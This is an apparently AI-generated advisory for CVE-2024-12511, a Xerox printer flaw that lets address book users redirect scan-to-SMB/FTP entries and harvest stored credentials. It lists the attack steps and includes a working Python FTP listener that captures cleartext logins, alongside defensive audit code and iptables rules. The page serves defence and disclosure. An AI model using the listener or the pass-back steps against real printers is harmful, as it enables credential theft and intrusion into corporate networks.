CVE-2024-12511 Overview
CVE-2024-12511 is a Missing Authentication for Critical Function vulnerability (CWE-306) in Xerox multifunction printers. A user with access to the device address book can change the SMB/FTP destination settings of a scan-to-network entry, redirecting scans to a host they control and capturing the credentials the printer presents when it connects. Exploitation requires that scan-to-network functions be enabled and that the attacker already have access to the printer.
Critical Impact
An attacker with address book access can repoint SMB/FTP scan destinations at a server under their control. The printer then authenticates to that server with the credentials stored for the entry (often a domain service account) and uploads the scanned document, so both the credentials and the documents are exposed.
Affected Products
- Xerox VersaLink Printers
- Xerox Phaser Printers
- Xerox WorkCentre Printers
Discovery Timeline
- 2025-02-03 - CVE-2024-12511 published to NVD
- 2025-09-17 - Last updated in NVD database
Technical Details for CVE-2024-12511
Vulnerability Analysis
The vulnerability is a missing authorization check on a critical printer function. When scan-to-network is enabled on an affected Xerox device, a user with address book access can change the SMB (Server Message Block) or FTP (File Transfer Protocol) destination of an existing entry without the elevated authentication such a change should require.
The attack begins with the adversary gaining access to the address book, either through legitimate low-privilege access or through weak access controls on the printer's web interface. The attacker then edits the server address of a scan destination, leaving the share path and the stored credentials intact, so that scans routed to that entry go to a host under their control.
The most severe consequence is credential harvesting, a classic pass-back attack. The next time a scan is sent to the modified entry, the printer connects to the attacker's server and authenticates with the credentials stored for that entry: for FTP this is a cleartext username and password, for SMB an NTLM challenge/response that can be cracked offline or relayed. Because scan accounts are frequently domain accounts, and sometimes over-privileged ones, this gives the attacker a foothold in the Windows environment. The scanned documents themselves are delivered to the attacker as well.
Root Cause
The root cause is CWE-306: Missing Authentication for Critical Function. The affected Xerox devices fail to implement adequate authentication checks before allowing modifications to network destination settings within the address book. This design flaw allows users with basic address book access to modify critical configuration parameters that should require elevated privileges or administrative authentication.
Attack Vector
The attack is network-based and requires only the ability to edit address book entries, which on many deployments is granted to any authenticated user of the printer's web interface. The exploitation process involves:
- Gaining access to the printer's address book through the web interface or the physical panel
- Changing the server address of an SMB or FTP destination to an attacker-controlled host
- Triggering a scan to that entry, or waiting for a legitimate user to do so
- Capturing the stored credentials when the printer authenticates to the rogue server
- Intercepting the scanned documents, which may contain sensitive information
No cooperation from a victim user is required, since the attacker can initiate the scan themselves from the panel, and the address book change itself can be made remotely over the network. See the Xerox Security Bulletin XRX25-003 for additional technical details.
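The listener below is the receiving end of the pass-back described above, written for this page as an added example; it is not code from Xerox, Rapid7 or the bulletin, and the host, port and sample transcript are constructed. It shows why a redirected scan-to-FTP entry leaks the stored account: FTP sends USER and PASS in cleartext, so whoever owns the destination host reads them off the control channel. The same code run by a defender is a canary, because no legitimate printer should ever connect to it.

```python
"""Credential-capturing FTP listener: the receiving side of a scan-to-FTP pass-back.

Added example, not from the Xerox bulletin or the NVD record. FTP authenticates
with USER/PASS in cleartext, so once an address-book entry points at this host
the printer hands over the credentials stored in that entry on its next scan.
Bind address, port and the sample transcript are constructed for this example.
"""
from __future__ import annotations

import socket
from dataclasses import dataclass, field
from typing import Optional

BANNER = b"220 FTP server ready\r\n"


@dataclass
class Capture:
    peer: str
    user: Optional[str] = None
    password: Optional[str] = None
    commands: list[str] = field(default_factory=list)

    @property
    def complete(self) -> bool:
        return self.user is not None and self.password is not None


def parse_ftp_command(line: bytes) -> tuple[str, str]:
    """Split one control-channel line into an upper-cased verb and its argument."""
    text = line.decode("latin-1").rstrip("\r\n")
    verb, _, arg = text.partition(" ")
    return verb.upper(), arg


def respond(capture: Capture, line: bytes) -> bytes:
    """Record what the client sent and return the reply the listener gives.

    Replies mimic a real server up to PASS, then refuse the login so the
    printer reports a failed scan instead of uploading the document here.
    """
    verb, arg = parse_ftp_command(line)
    capture.commands.append(verb)
    if verb == "USER":
        capture.user = arg
        return b"331 Password required\r\n"
    if verb == "PASS":
        capture.password = arg
        return b"530 Login incorrect\r\n"
    if verb == "QUIT":
        return b"221 Goodbye\r\n"
    # Anything else before a successful login is rejected, as a real server would.
    return b"530 Please login with USER and PASS\r\n"


def replay(lines: list[bytes], peer: str = "replay") -> Capture:
    """Feed a recorded control-channel transcript through the state machine (offline use)."""
    capture = Capture(peer)
    for line in lines:
        respond(capture, line)
    return capture


def serve_session(conn: socket.socket, peer: str) -> Capture:
    """Handle one TCP connection until the credentials are captured or the client leaves."""
    capture = Capture(peer)
    buf = b""
    with conn:
        conn.sendall(BANNER)
        while not capture.complete:
            data = conn.recv(1024)
            if not data:
                break
            buf += data
            while b"\n" in buf:
                line, buf = buf.split(b"\n", 1)
                conn.sendall(respond(capture, line))
    return capture


def listen(bind: str = "0.0.0.0", port: int = 2121) -> None:
    """Accept connections forever and print each captured credential pair.

    Printers connect to port 21: run as root on 21, or DNAT 21 -> 2121 to keep this port.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind, port))
        srv.listen()
        while True:
            conn, addr = srv.accept()
            cap = serve_session(conn, f"{addr[0]}:{addr[1]}")
            print(f"{cap.peer} user={cap.user!r} password={cap.password!r}")


# Constructed transcript of what a redirected printer sends (not a real capture).
SAMPLE_SESSION = [b"USER CORP\\svc-scan\r\n", b"PASS Sc4n-Me!\r\n", b"CWD /scans\r\n"]

if __name__ == "__main__":
    listen()
```

For SMB the equivalent listener has to speak NTLM (what tools such as impacket's smbserver or Responder do), and what it captures is an NTLMv2 challenge/response for offline cracking or relay rather than a cleartext password; the printer-side behaviour, authenticating to whatever host the entry names, is the same.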
Detection Methods for CVE-2024-12511
Indicators of Compromise
- Unexpected changes to the server address of SMB or FTP entries in printer address books, especially where only the host changed and the share path and login stayed the same
- Printer scan traffic directed to unfamiliar, non-corporate or external IP addresses
- Scan jobs failing on the device or reported by users (a rogue server that harvests the login typically refuses it), or the scan service account authenticating from unexpected hosts
- New or modified address book entries pointing to non-corporate network destinations
Detection Strategies
- Monitor printer configuration changes through SNMP traps or syslog events
- Implement network traffic analysis to detect scan data being sent to unauthorized destinations
- Audit address book modifications and correlate with authorized change requests
- Treat the scan service account as a canary: alert on any logon by that account from a source other than the printers, or to any server other than the approved scan share, since that is how harvested credentials get reused
Monitoring Recommendations
- Enable comprehensive logging on Xerox device web interfaces and correlate with SIEM solutions
- Monitor network flows from printer VLANs for connections to unknown external hosts
- Implement alerts for address book configuration exports or bulk modifications
- Conduct periodic audits comparing current address book entries against approved configurations
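The two audits recommended above (comparing address book entries against an approved list, and watching printer-VLAN flows for SMB/FTP to unknown hosts) share one allowlist check, so here they are implemented together as an added example. This is not Xerox code or a published tool: the CSV column names, the approved servers and the Zeek-style conn.log lines are all constructed for the example and need mapping to the real export format and flow source.

```python
"""Audit scan destinations and printer network flows against an allowlist.

Added example, not part of the Xerox bulletin or the NVD record. Two checks:
  1. audit_address_book(): every SMB/FTP address-book entry must point at an
     approved file server (by hostname or by IP/CIDR).
  2. flag_printer_flows(): every SMB/FTP connection from the printer VLAN must
     go to an approved server; anything else is a candidate redirected scan.
CSV columns, approved hosts and log lines are constructed for this example.
"""
import csv
import io
import ipaddress
from typing import Iterable
from urllib.parse import urlsplit

# Assumed approved scan servers (constructed): names and/or networks.
APPROVED_HOSTS = {"fileserver.corp.example", "10.0.10.5"}
APPROVED_NETS = [ipaddress.ip_network("10.0.10.0/24")]
SCAN_PORTS = {445: "smb", 139: "smb", 21: "ftp", 990: "ftps"}


def host_is_approved(host: str) -> bool:
    """True if host is an approved name or an address inside an approved network."""
    host = host.strip().strip("[]").lower()
    if host in APPROVED_HOSTS:
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # unknown hostname: not approved
    return any(ip in net for net in APPROVED_NETS)


def destination_host(dest: str) -> str:
    """Extract the server from 'smb://srv/share', '\\\\srv\\share', 'srv/share' or a bare host."""
    d = dest.strip()
    if "://" in d:
        return urlsplit(d).hostname or ""
    d = d.replace("\\", "/").lstrip("/")
    return d.split("/", 1)[0].split(":", 1)[0]


def audit_address_book(csv_text: str) -> list[dict]:
    """Return address-book rows whose SMB/FTP destination is not an approved server."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        proto = row["Protocol"].strip().lower()
        if proto not in ("smb", "ftp", "ftps", "sftp"):
            continue  # email/fax entries carry no share credentials
        host = destination_host(row["Destination"])
        if not host_is_approved(host):
            findings.append({"name": row["Name"], "protocol": proto,
                             "host": host, "destination": row["Destination"]})
    return findings


def flag_printer_flows(conn_lines: Iterable[str], printer_net: str) -> list[dict]:
    """Flag SMB/FTP flows from the printer subnet to non-approved servers.

    Input is a constructed Zeek conn.log-style TSV subset:
    ts, id.orig_h, id.orig_p, id.resp_h, id.resp_p, proto.
    """
    pnet = ipaddress.ip_network(printer_net)
    hits = []
    for line in conn_lines:
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, _sport, dst, dport, proto = line.split("\t")[:6]
        if proto != "tcp" or int(dport) not in SCAN_PORTS:
            continue
        if ipaddress.ip_address(src) in pnet and not host_is_approved(dst):
            hits.append({"ts": ts, "printer": src, "dest": dst,
                         "service": SCAN_PORTS[int(dport)]})
    return hits


# Constructed address-book export; the third entry has been redirected to 10.0.99.23.
ADDRESS_BOOK = """Name,Protocol,Destination,Login
Finance Scans,SMB,\\\\fileserver.corp.example\\scans,CORP\\svc-scan
Legal,FTP,ftp://10.0.10.5/legal,svc-scan
HR Intake,SMB,smb://10.0.99.23/scans,CORP\\svc-scan
Fax Line,Fax,+15550100,
"""

# Constructed flow records from the printer VLAN 10.0.50.0/24.
CONN_LOG = "\n".join([
    "#fields\tts\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto",
    "1738600000.1\t10.0.50.12\t51000\t10.0.10.5\t445\ttcp",
    "1738600050.4\t10.0.50.12\t51012\t10.0.99.23\t445\ttcp",
    "1738600060.0\t10.0.50.14\t51020\t203.0.113.7\t21\ttcp",
    "1738600070.0\t10.0.50.14\t51030\t10.0.10.5\t443\ttcp",
])

if __name__ == "__main__":
    for f in audit_address_book(ADDRESS_BOOK):
        print("address book:", f)
    for h in flag_printer_flows(CONN_LOG.splitlines(), "10.0.50.0/24"):
        print("flow:", h)
```

Run the address-book check against each device's export on a schedule and diff the findings against approved change requests; the flow check is the same allowlist applied to NetFlow or Zeek data and catches a redirected entry even when the device's own logs are not collected.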
How to Mitigate CVE-2024-12511
Immediate Actions Required
- Review and restrict address book access permissions to only authorized administrators
- Audit all SMB and FTP destination settings in affected printer address books
- Isolate printers on dedicated network segments with restricted outbound connectivity
- Disable scan-to-network functions on devices where they are not required
Patch Information
Xerox has released security updates to address this vulnerability. Refer to the Xerox Security Bulletin XRX25-003 for firmware update instructions and affected model-specific guidance.
Workarounds
- Implement network segmentation to prevent printer-initiated connections to untrusted networks
- Configure firewall rules to restrict outbound SMB (TCP 445) and FTP (TCP 21) traffic from printer subnets to approved file servers only
- Disable remote address book modification capabilities through printer security settings
- Use a dedicated, least-privilege account for scan-to-SMB (write-only to the scan share, no interactive logon) so a captured or relayed credential is of little use; restrict the account to NTLMv2 or Kerberos so a rogue server cannot downgrade the exchange to NTLMv1/LM, and require SMB signing on file servers to block relay of the captured authentication
# Example rules on the router between the printer VLAN (10.0.50.0/24) and the rest of
# the network (iptables FORWARD chain; addresses are examples). Allow SMB and FTP
# control connections only to the approved file server.
iptables -A FORWARD -s 10.0.50.0/24 -d 10.0.10.5 -p tcp -m multiport --dports 21,445 -j ACCEPT
# Log, then drop, every other SMB/FTP attempt from the printer VLAN: a hit here is a
# likely redirected scan entry. FTP data channels need nf_conntrack_ftp on the same box.
iptables -A FORWARD -s 10.0.50.0/24 -p tcp -m multiport --dports 21,139,445 -j LOG --log-prefix "PRINTER-SCAN-DENY "
iptables -A FORWARD -s 10.0.50.0/24 -p tcp -m multiport --dports 21,139,445 -j DROP
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.